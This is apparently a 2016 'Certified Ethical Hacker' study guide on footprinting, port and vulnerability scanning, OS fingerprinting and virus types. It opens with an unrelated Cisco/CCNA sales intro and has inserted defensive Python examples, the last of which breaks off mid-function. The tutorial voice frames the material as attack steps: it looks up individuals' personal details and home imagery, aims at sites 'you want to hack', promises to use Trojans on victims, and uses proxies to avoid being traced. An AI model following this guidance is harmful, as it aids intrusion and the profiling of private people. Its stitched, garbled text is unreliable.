
CERTIFIED ETHICAL HACKER

Study Guide

copyright © 2016 EAPL


Introduction
Welcome to the exciting world of the Elysium certification program! You have picked up
this book because you want something better in your career. Elysium is committed to
keeping you up to date with technology through this program, and you have made a good
decision to pursue career certification with Elysium: we can help you get your best
networking job, or more money and a promotion if you are already in the field. Cisco
certification can also improve your understanding of the internetworking of more than just
Cisco products: you will develop a complete understanding of networking and how different
network topologies work together to form a network. This is beneficial to every networking
job and is the reason Elysium training is in such high demand, even at companies with few
Cisco devices.

What Does this Book Cover?
This book covers everything you need to know in order to become CCNA certified.
However, taking the time to study and practice with routers or a router simulator is the
real key to success.
Most of the hands-on labs in the book assume that you have Cisco routers to play with.
If you don't, you can practice with simulators, and we will assist you in completing all of
the hands-on labs.


INTRODUCTION TO ETHICAL HACKING
Module Objectives
1. Overview of Current Security Trends
2. Understanding the Elements of Information Security
3. Understanding Information Security Threats and Attack Vectors
4. Overview of Hacking Concepts, Types, and Phases
5. Understanding Ethical Hacking Concepts and Scope

Attackers break into systems for various reasons and purposes. Therefore, it is important to
understand how malicious hackers exploit systems and the probable reasons behind the
attacks.
This module starts with an overview of the current security scenario and emerging threat
vectors. It provides an insight into the different elements of information security.

Module Flow
1. Information Security Overview
2. Information Security Threats and Attack Vectors
3. Hacking Concepts, Types, and Phases
4. Ethical Hacking Concepts and Scope
5. Information Security Controls
6. Information Security Laws and Standards

Information Security refers to protecting or safeguarding information and the information
systems that use, store, and transmit it from unauthorised access, disclosure, alteration,
and destruction.
Information is the critical asset that organizations need to secure. If sensitive information falls
into the wrong hands, the respective organization may suffer huge financial loss, loss of
brand reputation, loss of customers, etc. In an attempt to understand how to secure such critical
information resources, let us start with an overview of information security.

Case Study: Google Play Hack
Problem: Turkish hacker Ibrahim Balic brought down Google Play's entire system twice,
preventing developers from uploading new apps and updates to existing apps, and preventing
users from downloading content.
Cause: Balic did not stop after that first attempt. He uploaded it again to confirm it was his
work that had brought down the system. This resulted in a second DoS attack, once again
causing the database to crash. As a result, developers and users were unable to upload or
download any applications.

DIFFERENCE BETWEEN HACKER AND CRACKER
There are lots of articles on the internet about the difference between hackers and crackers.
There are several traditional ways of distinguishing hackers from crackers; in this book we
will present them in order of their acceptance in the computer and IT market. First of all,
let me provide the basic definitions of both hackers and crackers. These definitions are as
follows:

Hackers: A hacker is a person who is extremely interested in exploring the inner and
recondite workings of any computer system or networking system. Most often, hackers are
expert programmers. These are also called ethical hackers or white hat hackers, and are
also known as the "gurus" of computer security. These types of hackers protect the
cyberworld from every possible threat and fix security loopholes before they can be
exploited. The technique of hacking they perform is called ethical hacking. Ethical hacking
means you think like a hacker, i.e. first you hack the systems and find out the loopholes,
and then you try to correct those loopholes. And the most important thing: until and unless
an ethical hacker thinks like a cracker, you can never become an expert ethical hacker,
because to get the most out of any computer system you must understand the mind-set of
crackers: what they can do and up to what level they can damage.

The extent of the misconception can be judged from the fact that the world's biggest
authentic source, WIKIPEDIA, has defined hackers in an incorrect way. Wikipedia has
defined hackers in the following way: "Hacking is unauthorized use of computer and
network resources. (The term "Hacker" originally meant a very gifted programmer. In
recent years though, with easier access to multiple systems, it now has negative
implications.)" For many years, the media has erroneously used the word hacker for a
cracker. So the general public now believes a hacker is someone who breaks into computer
systems. But this is absolutely untrue and it demoralizes some of our most talented hackers.

Crackers: Crackers, or black hat hackers, or cheaters, or simply criminals. They are called
criminals because they have the mind-set of causing harm to security: they steal very useful
data and use it in wrong ways. Phishers also come in this category; they steal account
information, credit card numbers and money over the Net. Black hat hackers are intelligent
people, but criminals, or, as cyber cops call them, evil geniuses.

There is a very thin line between the hacker and the cracker. Like a coin has two faces,
heads or tails, the same is true for computer experts. Some use their techniques and
expertise to help others and secure systems or networks, and some misuse them for their
own selfish reasons. Now, when you identify the vulnerabilities and loopholes: if you fix
them so that in future no one can breach that same vulnerability, then you are a hacker,
ethical hacker or white hat hacker; if you use that loophole for misdeeds or for fun, then it
is cracking or black hat hacking. Below is the diagram which shows the basic difference
between crackers or black hat hackers and hackers, ethical hackers or white hat hackers.
[Diagram: hacker vs. cracker, not reproduced]
We hope this will help you to clear most of your doubts about hackers and crackers.

BEST OPERATING SYSTEM FOR HACKERS
Most users are confused about which operating system is best for hackers and for doing
hacking activities like hacking wireless network passwords, hacking passwords, network
sniffers, reverse engineering tools, application hacking tools and other encrypting and
spoofing hacking tools. Here we suggest the operating system BackTrack or Kali Linux. But
you can also give Matriux Operating System and Knoppix a try. Matriux OS is just awesome,
but it is still under construction as the designers are still working on it and patching it. Now
let's discuss more about the functionality of the BackTrack operating system.

Best Operating System: BackTrack Linux
BackTrack is a Linux-based penetration testing arsenal that aids security professionals in
performing assessments in a purely native environment dedicated to hacking. Regardless of
whether you're making BackTrack your primary operating system, booting from a Live DVD,
or using your favourite thumb drive, BackTrack has been customized down to every package,
kernel configuration, script and patch solely for the purpose of the penetration tester.
BackTrack is intended for all audiences, from the most savvy security professionals to early
newcomers to the information security field. BackTrack is quite possibly the most
comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate
the features of this distribution. For black-hat hackers, it provides easy access to software
that facilitates exploitation of secured systems and other reverse engineering. For
white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody
wins! BackTrack promotes a quick and easy way to find and update the largest database of
security tools collected to date.

Major Features of BackTrack Linux

BackTrack features the latest in security penetration software. The current Linux
kernel is patched so that special driver installation is unnecessary for attacks. For
example, an Atheros-based wireless networking adapter will not enter monitor mode
or inject packets without the MadWiFi driver patch. With BackTrack, you don't need
to worry about that. It's just plug-and-play, ready to go!
What's great is that this Linux distribution comes Live-on-CD, so no installation is
needed. However, once you experience BackTrack, you will realize that it is a must to
download this operating system and install it on your laptop. At the very least,
download the VMware Virtual Appliance for BackTrack. Make sure you also install
VMware Tools for Linux. Many features will still work in VMware mode.

Based on: Debian, Ubuntu
Origin: Switzerland
Architecture: i386
Desktop: Fluxbox, KDE
Category: Forensics, Rescue, Live Medium
Cost: Free
Hacking Tools:
BackTrack provides users with easy access to a comprehensive and large collection of
security-related tools ranging from port scanners to password crackers. Support for
Live CD and Live USB functionality allows users to boot BackTrack directly from
portable media without requiring installation, though permanent installation to hard
disk is also an option.
BackTrack includes many well known security tools including:
• Metasploit integration
• RFMON injection capable wireless drivers
• Kismet
• Nmap
• Ettercap
• Wireshark (formerly known as Ethereal)
• BeEF (Browser Exploitation Framework)
• A large collection of exploits as well as more commonplace software such as browsers
BackTrack arranges tools into 11 categories:
• Information Gathering
• Network Mapping
• Vulnerability Identification
• Web Application Analysis
• Radio Network Analysis (802.11, Bluetooth, RFID)
• Penetration (Exploit & Social Engineering Toolkit)
• Privilege Escalation
• Maintaining Access
• Digital Forensics
• Reverse Engineering
• Voice Over IP

CHAPTER – 1 FOOTPRINTING
Footprinting and How It Can Be Helpful to Hack Systems

What Is FOOTPRINTING?
Basically a footprint is the blueprint of the site/organisation/system that a hacker wants to
hack, i.e. its basic internal structure. Footprinting is the creation of a blueprint of the
security profile of an organization, undertaken in a methodical manner.
Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
Important thing to be noted: an attacker will spend 90% of the time in profiling an
organization and another 10% in launching the attack.
Footprinting results in a unique organization profile with respect to the networks
(Internet/intranet/extranet/wireless) and systems involved. Doesn't it look amazing?
The most interesting stage of a targeted attack is the reconnaissance, or footprint analysis.
Here you use the web, search engines and whois.com to discover as much about the target as
possible. A whois.com lookup can tell you email address formats, for instance (first letter +
last name @ company.com).
A Google search could reveal submissions to forums by security personnel that reveal the
brands of firewall or antivirus in use at the target. Sometimes network diagrams are even
found that can guide an attack. The next stage, scanning, meant using special tools (I date
myself by mentioning Cybercop and Internet Security Scanner; these were the days before the
open source Nessus) to discover open ports, services, and machines on the target network.
And then, finally, you could start attacking the various vulnerabilities that you had discovered.
SITES THAT HELP IN FOOTPRINTING!
1. www.whois.domaintools.com
Now, how can it help you to get info? I will show it through snapshots.
[Snapshot: whois lookup result, not reproduced]
2. Now you can use this information to search for more about the person using simply
Google, as shown in the next snapshot.
[Snapshot: Google search on the whois contact, not reproduced]
Now it's up to you how much info you want to explore about the person and the website
which you want to hack.

UNEARTHING BASIC INFORMATION
First of all we will focus on unearthing the basic information about the site, i.e. the IP and
server information. Here we will use two basic commands in the command prompt (cmd):
tracert www.websitename.com and ping www.websitename.com. I will show you with the help
of snapshots: first go to START –> RUN –> type cmd –> then type
tracert www.webistetobeanlysed.com. It will look something like this:
[Snapshot: tracert output, not reproduced]
We trace routed www.amulive.com.
1. Shows our outgoing footprint IP (i.e. our IP that is being analyzed by the website). (I use
BSNL but it's showing Airtel because I prefer the DNS of Airtel for quick surfing.)
2. Shows our gateway of connectivity.
3. Shows which service provider the connectivity passes through. The next steps show the
IPs of the web servers through which amulive is being maintained.
After this we will come to know the IP of the website and the IPs of its web servers, which
are used further: the website IP can be used to gather more information about the website.
We will explore more information in the next class, and we will continue our discussion on
FOOTPRINTING tomorrow also, as it is the most important phase. I will explain a few more
interesting facts and information-exploring things, so read on. I think you all will like this.

How to Find the Personal Information About an Individual Over the Net??
It's one of the most important tasks. It's also helpful in finding fake profiles. But
unfortunately this is limited; still, we can use it to the most. There are two websites which
will help us:
1. http://www.intellius.com (best site to trace people for their personal information and
also reverse phone or mobile number look up)
2. http://people.yahoo.com (but this site is limited to US only)
Sample report from Intellius:
[Snapshot: sample Intellius report, not reproduced]

Satellite picture of Joe's house from Intellius:
[Snapshot, not reproduced]
Now using these sites you will be able to collect the personal information of individuals and
also be able to identify fake profiles.
TOOLS NEEDED FOR FOOTPRINTING:
You can avoid the above hectic work by using this tool: SpiderFoot.
Download link: http://www.binarypool.com/spiderfoot/
Information about SpiderFoot: SpiderFoot is a free, open-source, domain footprinting tool.
Given one or multiple domain names (and when I say domains, I'm referring to the DNS kind,
not Windows domains), it will scrape the websites on that domain, as well as search Google,
Netcraft, Whois and DNS to build up information like:
• Subdomains
• Affiliates
• Web server versions
• Users (i.e. /~user)
• Similar domains
• Email addresses
• Netblocks
ADDITIONAL FOOTPRINTING TOOLS:
Note: all these tools are freeware. You can easily google them and download them.
• Whois
• Nslookup
• ARIN
• Neo Trace
• VisualRoute Trace
• SmartWhois
• eMailTrackerPro
• Website watcher
• Google Earth
• GEO Spider
• HTTrack Web Copier
• E-mail Spider
This is all about footprinting. Now use the gathered information to build basic detailed
information about the website/person.

CHAPTER – 2 SCANNING NETWORKS
Scanning and Attacking Open Ports
In the scanning part we will cover the following topics in detail:
~ Definition of scanning
~ Types and objectives of scanning
~ Understanding scanning methodology
~ Checking live systems and open ports
~ Understanding scanning techniques
~ Different tools present to perform scanning
~ Understanding banner grabbing and OS fingerprinting
~ Drawing network diagrams of vulnerable hosts
~ Preparing proxies
~ Understanding anonymizers
~ Scanning countermeasures

What Is Scanning?? And Why Do We Focus On That?
Scanning, as the name suggests, means that we will scan something to find some details.
Scanning basically refers to gathering the following four pieces of information. We scan
systems for four basic purposes:
• To find a specific IP address
• Operating system
• System architecture
• Services running on the system
The various types of scanning are as follows:
~ Port Scanning
~ Network Scanning
~ Vulnerability Scanning
I want to define these terms here only, as they are of great use in the further tutorial.
PORT SCANNING: There are 64k ports in a computer, out of which 1k are fixed for system or
OS services. In port scanning, a series of messages is sent by someone attempting to break
into a computer to learn about the computer's network services. In port scanning we scan for
the open ports, which can be used to attack the victim computer. Through this we will know
which port we will use to attack the victim.
Network Scanning: Network scanning is basically a procedure of finding the active hosts on
the network, i.e. we try to find whether the system is standalone or multiuser. This is done
either for the purpose of attacking them or for network security assessment, i.e. how secure
is the network?
Vulnerability Scanning: As the name suggests, in this type of scanning we scan the systems
for vulnerabilities, i.e. weaknesses in the OS/database. Once we find the vulnerability or
loophole we can utilize it to the best and attack the victim through that.

OBJECTIVES OF SCANNING
These are the primary objectives of scanning, i.e. why do we do scanning:
~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.
We will prefer TOOLS for this because they will reduce our hectic work. The first tool that
we use is NMAP:
DOWNLOAD: http://nmap.org/dist/nmap-5.00-setup.exe
Features of NMAP:
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep, and
many other techniques.
~ It is supported by many operating systems.
~ It scans a large number of machines at one time.
~ It can carry out all types of port scanning techniques.
SECOND TOOL IS NET TOOLS 5.0.70: It is a collection of various networking tools; a must
for beginners.
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html
~ Net Tools Suite Pack is a collection of scanning tools.
~ This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers.
Note: Some of these tools may not work but some are too good.
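The topic list above ends with scanning countermeasures. As an added example that is not part of the original guide, the Python below detects in firewall logs both scan types the text defines, many ports on one host (port scanning) and one port across many hosts (network scanning); the log line format, the threshold, the time window and all addresses are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall log lines ("timestamp action proto src -> dst"); not captured
# from a real device. Addresses are from the RFC 5737 documentation ranges.
VERTICAL_SCAN = [  # one source probing many ports on one host, one per second
    f"2016-03-01T10:00:{i:02d} DROP TCP 198.51.100.7:40{i:03d} -> 192.0.2.10:{port}"
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445])
]
HORIZONTAL_SCAN = [  # one source probing port 445 across ten hosts
    f"2016-03-01T10:05:{i:02d} DROP TCP 203.0.113.9:51000 -> 192.0.2.{i + 1}:445"
    for i in range(10)
]
NORMAL_TRAFFIC = [  # an ordinary client: a few connections to web ports
    "2016-03-01T10:07:00 ALLOW TCP 192.0.2.50:52001 -> 192.0.2.10:443",
    "2016-03-01T10:07:03 ALLOW TCP 192.0.2.50:52002 -> 192.0.2.11:80",
    "2016-03-01T10:07:09 ALLOW TCP 192.0.2.50:52003 -> 192.0.2.10:443",
]
SAMPLE_LOG = VERTICAL_SCAN + HORIZONTAL_SCAN + NORMAL_TRAFFIC

LOG_RE = re.compile(r"^(\S+) (ALLOW|DROP) (TCP|UDP) (\S+):(\d+) -> (\S+):(\d+)$")


def parse_line(line):
    """Parse one log line into a dict, or return None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m.group(1)),
        "action": m.group(2),
        "src": m.group(4),
        "dst": m.group(6),
        "dport": int(m.group(7)),
    }


def detect_scans(lines, window=timedelta(seconds=60), threshold=10):
    """Flag sources touching >= threshold distinct (host, port) pairs within window.

    The classification follows the page's two scan types: many ports on one host
    versus one port across many hosts.
    """
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    alerts = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window so evs[start:end+1] spans at most `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            targets = {(e["dst"], e["dport"]) for e in evs[start:end + 1]}
            if len(targets) < threshold:
                continue
            hosts = {d for d, _ in targets}
            ports = {p for _, p in targets}
            if len(hosts) == 1:
                kind = "vertical (port scan of one host)"
            elif len(ports) == 1:
                kind = "horizontal (one port across the network)"
            else:
                kind = "mixed"
            current = alerts.get(src)
            # Keep the widest window seen for this source.
            if current is None or len(targets) > current["targets"]:
                alerts[src] = {
                    "kind": kind,
                    "targets": len(targets),
                    "first": evs[start]["ts"],
                    "last": evs[end]["ts"],
                }
    return alerts


if __name__ == "__main__":
    for src, a in detect_scans(SAMPLE_LOG).items():
        print(f"{src}: {a['kind']}, {a['targets']} targets "
              f"between {a['first'].time()} and {a['last'].time()}")
```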


First of which is OS fingerprinting.
What is OS Fingerprinting??
OS fingerprinting is the method to determine the operating system that is running on the
target system. The two different types of fingerprinting are:
• Active stack fingerprinting
• Passive fingerprinting
Active Stack Fingerprinting: Based on the fact that OS vendors implement the TCP stack
differently. Specially crafted packets are sent to remote OSs and the response is noted. The
responses are then compared with a database to determine the OS.
Passive Fingerprinting: Passive banner grabbing refers to indirectly scanning a system to
reveal its server's operating system. It is also based on the differential implementation of
the stack and the various ways an OS responds to it. It uses sniffing techniques instead of
scanning techniques. It is less accurate than active fingerprinting.
TOOL USED FOR OS FINGERPRINTING: p0f OS Fingerprinting Tool
DOWNLOAD: http://lcamtuf.coredump.cx/p0f-win32.zip
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
• machines that connect to your box (SYN mode),
• machines you connect to (SYN+ACK mode),
• machines you cannot connect to (RST+ mode),
• machines whose communications you can observe.
P0f can also do many other tricks, and can detect or measure the following:
• firewall presence, NAT use (useful for policy enforcement),
• existence of a load balancer setup,
• the distance to the remote system and its uptime,
• the other guy's network hookup (DSL, OC3, avian carriers) and his ISP.
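As an added example that is not from the original guide or from p0f itself, the Python below shows the passive method just described: matching the attributes of a sniffed SYN (TTL, window, DF flag, MSS) against a signature table, deriving the hop distance, and flagging NAT when one address shows several stacks. The signature values and the observed packets are illustrative constructions, not p0f's database.

```python
# Illustrative SYN-packet signature table. Assumption: these are widely quoted
# default values for each stack (initial TTL, TCP window, DF flag, MSS); they are
# not p0f's real fingerprint database and are here only to show the method.
SIGNATURES = [
    {"os": "Linux 2.6",      "ttl": 64,  "win": 5840,  "df": True,  "mss": 1460},
    {"os": "Linux 3.x/4.x",  "ttl": 64,  "win": 29200, "df": True,  "mss": 1460},
    {"os": "FreeBSD",        "ttl": 64,  "win": 65535, "df": True,  "mss": 1460},
    {"os": "Windows XP",     "ttl": 128, "win": 65535, "df": True,  "mss": 1460},
    {"os": "Windows 7/2008", "ttl": 128, "win": 8192,  "df": True,  "mss": 1460},
    {"os": "Cisco IOS",      "ttl": 255, "win": 4128,  "df": False, "mss": 536},
]

COMMON_INITIAL_TTLS = (64, 128, 255)


def initial_ttl(observed_ttl):
    """Round an observed TTL up to the initial TTL the sender most likely used."""
    for base in COMMON_INITIAL_TTLS:
        if observed_ttl <= base:
            return base
    return COMMON_INITIAL_TTLS[-1]


def fingerprint(syn):
    """Guess the OS from one sniffed SYN and derive the hop distance, as p0f does."""
    ttl0 = initial_ttl(syn["ttl"])
    distance = ttl0 - syn["ttl"]
    matches = [
        s["os"] for s in SIGNATURES
        if s["ttl"] == ttl0 and s["win"] == syn["win"]
        and s["df"] == syn["df"] and s["mss"] == syn["mss"]
    ]
    if matches:
        return {"os": matches[0], "distance": distance,
                "confidence": "high" if len(matches) == 1 else "medium"}
    # No full match: fall back to the coarse family the initial TTL implies.
    family = {64: "Unix-like", 128: "Windows", 255: "network device/Solaris"}[ttl0]
    return {"os": f"unknown ({family} by TTL)", "distance": distance,
            "confidence": "low"}


def detect_nat(syns):
    """Return source IPs whose SYNs fingerprint as different operating systems.

    One address emitting several distinct stacks is the classic sign of several
    machines behind a NAT, one of the conditions p0f reports.
    """
    seen = {}
    for syn in syns:
        seen.setdefault(syn["src"], set()).add(fingerprint(syn)["os"])
    return sorted(src for src, oses in seen.items() if len(oses) > 1)


# Constructed SYN observations (the fields a sniffer would extract), not real captures.
OBSERVED_SYNS = [
    {"src": "192.0.2.7",     "ttl": 54,  "win": 29200, "df": True,  "mss": 1460},
    {"src": "192.0.2.8",     "ttl": 121, "win": 8192,  "df": True,  "mss": 1460},
    {"src": "192.0.2.9",     "ttl": 250, "win": 4128,  "df": False, "mss": 536},
    {"src": "192.0.2.10",    "ttl": 60,  "win": 12345, "df": True,  "mss": 1460},
    {"src": "198.51.100.20", "ttl": 58,  "win": 5840,  "df": True,  "mss": 1460},
    {"src": "198.51.100.20", "ttl": 122, "win": 65535, "df": True,  "mss": 1460},
]

if __name__ == "__main__":
    for syn in OBSERVED_SYNS:
        print(syn["src"], fingerprint(syn))
    print("NAT suspected:", detect_nat(OBSERVED_SYNS))
```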

What is Vulnerability???
As I have told in the first class, a vulnerability is a weakness in the network, system,
database etc. We can call a vulnerability a loophole, i.e. something through which the victim
can be attacked. We first analyze the loophole and then try to use it to best effect to hack
the system of the victim, organisation or website.
TOOLS THAT WE USE FOR VULNERABILITY SCANNING ARE:
1. Nessus
2. Retina

NESSUS
The Nessus® vulnerability scanner is the world leader in active scanners, featuring high
speed discovery, configuration auditing, asset profiling, sensitive data discovery and
vulnerability analysis of your security posture. Nessus scanners can be distributed
throughout an entire enterprise, inside DMZs, and across physically separate networks.
Features:
~ Plug-in architecture
~ NASL (Nessus Attack Scripting Language)
~ Can test an unlimited number of hosts simultaneously
~ Smart service recognition
~ Client-server architecture
~ Smart plug-ins
~ Up-to-date security vulnerability database
SAMPLE SNAPSHOT: [Snapshot: Nessus interface, not reproduced]
DOWNLOAD NESSUS: http://www.nessus.org/download/

RETINA
Retina Network Security Scanner, the industry and government standard for multi-platform
vulnerability management, identifies known and zero-day vulnerabilities plus provides
security risk assessment, enabling security best practices, policy enforcement, and
regulatory audits.
Features:
~ Retina Network Security Scanner is a network vulnerability assessment scanner.
~ It can scan every machine on the target network, including a variety of operating system
platforms, networking devices, databases, and third party or custom applications.
~ It has the most comprehensive and up-to-date vulnerability database and scanning
technology.
SAMPLE SNAPSHOT: [Snapshot: Retina interface, not reproduced]

DOWNLOAD RETINA: http://www.eeye.com/html/products/retina/download/index.html
Now after scanning the systems for vulnerabilities, we will go on to attack the systems, but
before this we should know the risk. This risk can be reduced to a great extent by using
proxies. In the next class we will discuss what proxies are, how they work, how they are
going to help us, and some undetectable and untraceable proxy servers.

SCANNING AND ATTACKING OPEN PORTS
In my previous class I explained footprinting, i.e. getting the IP of the
person/website/organisation whom you want to attack and extracting the personal
information. You were all thinking, what was the use of that? In this class you will come to
know why we have undergone the footprinting and analysis part.


I think that's enough for today. We will discuss more on scanning tomorrow. Until then, try
these tools. If you have any problem in using these tools then you can ask me; I will help
you use these tools.

INTRODUCTION TO TROJANS, VIRUSES AND BACKDOORS
Welcome back guys. After a heavy busy schedule I come with the next hacking tutorial. In
today's class I am going to introduce what Trojans, viruses, backdoors, worms etc. are, and
how they work to infect the system. In later classes we will discuss more about them, like
how to get rid of viruses, Trojans etc., how to remove them and, most important, how to use
them for hacking victims' systems. So guys, keep reading. Let's start with viruses: what are
these and how do they work.
VIRUSES: A virus is a self-replicating program that produces its own code by attaching copies
of itself into other executable code like executable files (.exe), dynamic link libraries (.dll)
etc. A virus generally operates in the background and, of course, without the desire of the
user, as no one wants a virus to harm their computer. I think everybody who uses a computer
has faced the problem of viruses at least once in life. ROFL :P
Some well-known characteristics of viruses:
• Resides in memory and replicates itself while the program it is attached to is running
• Does not reside in memory after the execution of the program
• Can transform itself by changing its code to appear different
• Hides itself from detection in three ways:
  1. Encrypts itself into cryptic symbols (encodes itself with special characters)
  2. Alters the disk directory data to compensate for the additional virus bytes (changes the
  location of the file by adding one additional bit to the data location)
  3. Uses stealth algorithms to redirect disk data
WORKING OF VIRUSES:
Generally most viruses work in two phases:
1. Infection Phase
2. Attack Phase
From the names you can have an idea what these phases are.
1. Infection Phase:
– Virus developers decide when to infect the host system's programs
– Some infect each time they are run and executed completely. Ex: Direct viruses
– Some virus codes infect only when users trigger them, which can include a day, time, or a
particular event. Ex: TSR viruses, which get loaded into memory and infect at later stages
2. Attack Phase:
– Some viruses have trigger events to activate and corrupt systems
– Some viruses have bugs which replicate and perform activities like file deletion,
increasing session time
– They corrupt the targets only after spreading completely, as intended by their developers
It will be much clearer from the snapshot how the virus works:
Fig: Infection Phase, showing how the file is attached to .exe files to infect programs.
[Figure not reproduced]
Fig: Attack Phase, showing how the files get fragmented and the system speed slows down.
[Figure not reproduced]

Why People Create Viruses??
I think everybody is wondering why people create viruses and which people create them. The
real question that came to my mind when I was a newbie in this field, hahahaha. Some of the
most common reasons are discussed below:
• Research projects (people doing research work detect the flaws in a particular system and
create code for that)
• Pranks (just for fun, like people who create viruses for irritating friends)
• Vandalism
• To attack the products of specific companies (like Microsoft products XP, Vista,
Windows 7 etc.)
• To distribute political messages
• Financial gain (stealing money from accounts etc.)
• Identity theft
• Spyware (to monitor the working of remote computers)
SYMPTOMS OF VIRUS ATTACKS:
Hey guys, below I have mentioned some symptoms that will indicate that your system is
infected by viruses. If the system acts in an unprecedented manner, you can suspect a virus
attack, that is, processes take more resources and are more time consuming than before, i.e.
the system hangs frequently. Some more are mentioned below:
– If the computer beeps with no display
– If one out of two anti-virus programs reports a virus on the system
– If the label of the hard drive changes
– Your computer freezes frequently or encounters errors
– Your computer slows down when programs are started
– You are unable to load the operating system
– Files and folders are suddenly missing or their content changes
– Your hard drive is accessed too often (the light on your main unit flashes rapidly)
– Microsoft Internet Explorer "freezes"
– Your friends mention that they have received messages from you but you never sent such
messages

DIFFERENCE BETWEEN WORMS AND VIRUSES
Most of us think that worms are viruses and that they work similarly to viruses, but this is
not the real scenario. There is a big difference between general viruses and worms. A worm
is a special type of virus that can replicate itself and use memory, but cannot attach itself to
other programs. A worm spreads through the infected network automatically, but a virus
does not.
How To Detect That Your System is Infected by a Virus??
This is one of the major questions to answer, and the simplest answer is that there are some
general indications that tell whether a system is infected or not. The general indications are
stated below:
• Programs take longer to load than normal (because the virus halts the normal working of
programs as it attaches itself to them, so the execution time increases).
• The computer's hard drive constantly runs out of free space.
• Files have strange names which are not recognizable.
• Programs act erratically (programs give errors on use).
• Resources are used up easily (can be easily viewed using Task Manager).
HOW DOES THE VIRUS INFECT THE SYSTEM??
Viruses infect the system in the following ways:
1. Loads itself into memory and checks for executables on the disk.
2. Appends the malicious code to a legitimate program which is important to the user.
3. Since the user is unaware of the replacement, he/she launches the infected program.
4. As a result of the infected program being executed, other programs get infected as well.
5. The above cycle continues until the user realizes the anomaly within the system.

STAGES OF VIRUS LIFE CYCLE FROM DESIGN TO ELIMINATION
[Figure: virus life cycle diagram, not included in this extraction.] The life cycle indicated above is a general life cycle of the virus from the design phase to the elimination phase...

VIRUS CLASSIFICATION – TYPES OF VIRUSES
Viruses are classified on the basis of two basic things:
1. What they infect
2. How they infect
Examples:
System Sector or Boot Virus: Infects disk boot sectors and records.
File Virus: Infects executables in the OS file system.
Macro Virus: Infects documents, spreadsheets and databases such as Word, Excel and Access.
Source Code Virus: Overwrites or appends host code by adding Trojan code to it.
Network Virus: Spreads itself via email by using the commands and protocols of the computer network.

Different Types of Virus and Worms Explained

System Sector Viruses
System sectors are special areas on your disk containing programs that are executed when you boot (start) your PC. System sectors (Master Boot Record and DOS Boot Record) are often targets for viruses. These boot viruses use all of the common viral techniques to infect and hide themselves. They rely on an infected floppy disk left in the drive when the computer starts; they can also be "dropped" by some file infectors or Trojans.

Stealth Virus
These viruses evade anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it appears as if the file is "clean".

Bootable CD-ROM Virus
These are a new type of virus that destroys the hard disk data content when the machine is booted with the infected CD-ROM. Example: Someone might give you a LINUX BOOTABLE CD-ROM. When you boot the computer using the CD-ROM, all your data is gone. No anti-virus can stop this, because the AV software or the OS is not even loaded when you boot from a CD-ROM.

Self-Modification Virus
Most modern antivirus programs try to find virus patterns inside ordinary programs by scanning them for virus signatures. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. Self-modification viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection (each infected file contains a different variant of the virus).

Polymorphic Code Virus

Polymorphic code is code that mutates while keeping the original algorithm intact. To enable polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or mutation engine). A well-written polymorphic virus therefore has no parts that stay the same on each infection.

Metamorphic Virus
Metamorphic viruses rewrite themselves completely each time they are to infect new executables. Metamorphic code is code that can reprogram itself by translating its own code into a temporary representation, and then back to normal code again. For example, W32/Simile consisted of over 14000 lines of assembly code; 90% of it is part of the metamorphic engine.

File Extension Virus
File extension viruses change the extensions of files. .TXT is safe as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT. If you've forgotten that extensions are actually turned off, you might think this is a text file and open it. This is really an executable Visual Basic Script virus file and could do serious damage. The countermeasure is to turn off "Hide file extensions" in Windows.
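As an added example (not from the study guide), the following Python checks a list of file names for the BAD.TXT.VBS trick: a real executable extension hidden behind a decoy one once Windows hides known extensions. The extension sets and the sample file names are constructed for the example and are not exhaustive.

```python
# Added example, not from the study guide: spotting the BAD.TXT.VBS trick
# described above, where a decoy "safe" extension hides the real one once
# Windows hides known extensions. The extension sets and the sample file
# names below are constructed for this example and are not exhaustive.

# Extensions Windows runs as a program or script when double-clicked.
EXECUTABLE_EXTENSIONS = {
    "exe", "com", "scr", "pif", "bat", "cmd",
    "vbs", "vbe", "js", "jse", "wsf", "wsh", "ps1",
}
# Extensions users tend to read as harmless data.
DECOY_EXTENSIONS = {"txt", "doc", "pdf", "jpg", "jpeg", "png", "gif", "mp3", "xls"}

# Constructed sample attachment names.
SAMPLE_FILES = [
    "BAD.TXT.VBS",
    "report.pdf",
    "C:\\Users\\me\\Downloads\\holiday.jpg.exe",
    "notes.txt",
    "setup.exe",
    "archive.tar.gz",
]


def _basename(filename):
    """Strip any directory part, accepting / or \\ as separator."""
    return filename.replace("\\", "/").rsplit("/", 1)[-1]


def true_extension(filename):
    """The extension Windows actually acts on: the last one, lower-cased."""
    name = _basename(filename)
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def displayed_name(filename):
    """What Explorer shows with "Hide extensions for known file types" on:
    a known final extension disappears, so BAD.TXT.VBS is shown as BAD.TXT.
    Extensions outside the two sets above are treated as unknown and kept."""
    name = _basename(filename)
    ext = true_extension(filename)
    if ext in EXECUTABLE_EXTENSIONS or ext in DECOY_EXTENSIONS:
        return name.rsplit(".", 1)[0]
    return name


def is_disguised_executable(filename):
    """True when the real extension is executable and the name the user
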